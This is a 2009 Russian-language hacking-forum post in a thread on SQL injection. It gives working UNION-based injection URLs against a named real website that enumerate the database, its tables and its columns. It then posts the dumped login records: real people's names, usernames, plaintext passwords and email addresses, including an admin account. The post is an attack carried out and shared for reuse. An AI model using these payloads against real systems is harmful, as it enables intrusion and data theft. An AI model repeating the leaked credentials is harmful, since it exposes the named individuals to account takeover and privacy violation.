Тема: SQL Инъекции
Показать сообщение отдельно

  #4  
Старый 02.06.2009, 14:05
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию
ttp://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4
5.0.22:cinergiedbuser@localhost:cinergiedb

таблицы:
http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,table_name,3,4+from+informatio n_schema.tables
Интересующие нас таблицы: login и user

поля login:
http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,column_name,3,4+from+informati on_schema.columns+where+table_name=0x6c6f67696e

http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,id,nom,login,pa ssword,email),3,4+from+login

1imitra:dimi:kenzo:dimitra.bouras@gmail.com




2:Samira:sami:alpacino:samira@cinergie.be




3:Sarah:deela:ninou:sdeela@hotmail.com



4oria:doria:admin:dhamelryk@tempo

поля user:
http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,column_name,3,4+from+informati on_schema.columns+where+table_name=0x75736572

сами юзеры
http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,id,login,pass,p seudo,email,privilege),3,4+from+user

перечеслять здесь не буду
 
Ответить с цитированием